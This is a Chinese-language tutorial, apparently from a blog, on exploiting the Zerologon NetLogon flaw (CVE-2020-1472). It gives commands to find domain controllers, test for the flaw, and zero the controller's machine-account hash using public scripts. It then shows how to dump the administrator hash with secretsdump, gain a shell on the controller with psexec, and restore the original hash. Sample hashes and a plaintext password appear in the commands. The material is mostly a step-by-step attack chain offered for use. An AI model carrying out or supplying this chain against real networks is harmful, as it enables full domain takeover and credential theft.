0x01 概述

2020年8月12日,阿里云应急响应中心监测到微软发布补丁修复了NetLogon权限提升漏洞(CVE-2020-1472),CVSS评分10,官方评级严重。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行相应代码或者程序。

此漏洞用于域控提权,完整利用此漏洞域控需开启135和445端口。

此漏洞的所有脚本用python3.7不会存在报错。

0x02 检测漏洞是否存在

  • 如果该机器同时开放53,135,445的话,很大概率就是域控

  • 如果知道域名的话,可以尝试通过dns查询

    Linux下命令有dig 域名 ns dig _ldap._tcp.域名 srvWindows下命令有nslookup –qt=ns 域名Nslookup -type=SRV _ldap._tcp.域名
  • 如果我们控制了一台域成员机器,可以直接查询。

  • net time /domainnet group "Domain controllers" /domain dsquery server -o rdnadfind -sc dclistNltest /dclist:域名

脚本地址:https://github.com/SecuraBV/CVE-2020-1472

#python zerologon_tester.py 域控主机名 域控主机ippython zerologon_tester.py ad01 192.168.85.129

出现success证明漏洞存在。

0x03 置空域控哈希

    脚本地址:https://github.com/0xkami/CVE-2020-1472

#python 2.py 域控主机名 域控主机名$ 域控主机ip python 2.py ad01 ad01$ 192.168.85.129挂socks5代理proxychains4 -q python 2.py ad01 ad01$ 192.168.85.129

0x04 导出域内哈希并连接域控

脚本地址:https://github.com/SecureAuthCorp/impacket

Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。

这里使用examples文件夹下的secretsdump.py和psexec.py

使用空哈希导出administrator用户哈希#python secretsdump.py "域名/域用户主机名"@域用户ip地址 -hashes 空值的哈希 -just-dc-user "administrator用户名"python secretsdump.py "ka/ad01$"@192.168.85.129 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "administrator"

连接域控#python psexec.py 域名/administrator用户@域ip地址 -hashes 导出的administrator用户的哈希python psexec.py ka/administrator@192.168.85.129 -hashes aad3b435b51404eeaad3b435b51404ee:7ecffff0c354887607a14bad0f88bb1

0x05 恢复域控哈希

    使用zerologon底下的reinstall_original_pw.py再打一次,计算密码的时候使用空密码的hash去结算session_key。直接使用机器账号的原始NTLM

哈希还原。

    脚本地址:https://github.com/risksense/zerologon

python reinstall_original_pw.py ad01 192.168.85.129 d0aeb0472d4400ec08b2f9fe8ed17655

查看发现ad的密码已经恢复了

python secretsdump.py ka/administrator:1qaz@WSX3edc@192.168.85.129 -just-dc-user "ad01$"

参考文章:https://xie1997.blog.csdn.net/article/details/109030009

https://mp.weixin.qq.com/s/S9Hwb1-lLhh4QfI4b551SQ

CVE-2020-1472NetLogon权限提升漏洞相关推荐

  1. netlogon启动后停止_【通告更新】漏洞EXP已流出,影响巨大,微软NetLogon权限提升漏洞安全风险通告第三次更新...

    近日,奇安信CERT监测到国外安全厂商发布了NetLogon 权限提升漏洞(CVE-2020-1472)的详细技术分析文章和验证脚本.此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS漏洞评分10 ...

  2. linux ssh权限漏洞,OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)

    OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) 发布日期:2016-05-02 更新日期:2016-05-04 受影响系统:OpenSSH OpenSSH &l ...

  3. CVE-2021-33909:Linux本地权限提升漏洞

    Linux本地权限提升漏洞影响大多数Linux发行版. 漏洞概述 Qualys研究人员在Linux kernel中发现一个本地权限提升漏洞--Sequoia,该漏洞是Linux kernel文件系统层 ...

  4. linux系统中acpid的作用,ACPID电源按钮事件本地权限提升漏洞

    发布日期:2011-12-08 更新日期:2012-08-21 受影响系统: acpid acpid 2.0.10 acpid acpid 1.0.8 acpid acpid 1.0.3 acpid ...

  5. Linux Kernel ‘CLONE_NEWUSER|CLONE_FS’本地权限提升漏洞

    漏洞名称: Linux Kernel 'CLONE_NEWUSER|CLONE_FS'本地权限提升漏洞 CNNVD编号: CNNVD-201303-281 发布时间: 2013-03-15 更新时间: ...

  6. Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034)修复方法及centos6和centos7的安装包

    近日安全监测发现Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034),pkexec应用程序为 Linux 系统预装工具,漏洞影响Ubuntu.Debia ...

  7. CVE-2020-1472 Netlogon权限提升漏洞分析

    一.漏洞信息 1. 漏洞简述 漏洞名称:Netlogon 权限提升漏洞 漏洞编号:CVE-2020-1472 漏洞类型:权限提升 CVSS评分:10 利用难度:简单 基础用户:不需要 2. 组件概述 ...

  8. Polkit权限提升漏洞(CVE-2021-4034)利用及修复

    Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 文章目录 Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 漏洞说明 危害等级 影响版本 修复版本 漏洞利用 ...

  9. MICROSOFT TEAMS MACOS版本本地权限提升漏洞

    Offensive Security安全研究人员在Microsoft Teams的XPC 服务中发现了一个安全漏洞,并将漏洞报告给了MSRC,微软确认了该漏洞但决定不立即修复. 漏洞根源分析 漏洞是两 ...

最新文章

  1. 【机器学习入门】(13) 实战:心脏病预测,补充: ROC曲线、精确率--召回率曲线,附python完整代码和数据集
  2. linux tomcat端口冲突解决
  3. 十八、多生产者--多消费者问题
  4. Linux 应用编程
  5. docker-compose安装mongodb
  6. 批量获取远程计算机MAC
  7. 北方大学 ACM 多校训练赛 第十五场 欢度6.18
  8. springcloud服务注册和发现
  9. 小甲鱼Python笔记(下)
  10. python是什么 自学-python自学需要什么软件?
  11. 5. Adapter Pattern(适配器模式)
  12. 【GIS教程】土地利用转移矩阵、土地利用面积变化
  13. 数据仓库专题(14)-数据仓库建设指导原则:一切以就绪数据为主
  14. hadoop启动mysql服务_Hadoop MySQL 服务自启动配置
  15. 三人表决器实验报告总结_三人表决器实验报告
  16. 特征提取 --- 文本特征抽取
  17. 一位仁兄对于项目管理的精辟见解
  18. 宽字符处理函数函数与普通函数对照表
  19. 应届生求职前端工程师岗位,该如何准备?
  20. pandas数据分组聚合——groupby()、aggregate()、apply()、transform()和filter()方法详解

热门文章

  1. 对某邮件盗号诈骗团队的追踪分析和研究
  2. 做一个很出色的程序员
  3. [BZOJ1587]叶子合并leaves
  4. 样式和主题(Style and Theme)详解
  5. 大数据学习之 ElasticSearch 练习
  6. The client was disconnected by the server because of inactivity解决方案
  7. 一键查询微信加过那些群聊
  8. 明星热图|欧阳娜娜、张艺兴代言新品牌;吴彦祖、高圆圆、全智贤演绎服装新品;关晓彤、欧阳靖、张云龙出席品牌活动...
  9. 十万部冷知识:“澳大利亚”为什么属于亚洲球队?
  10. golang-命令源码文件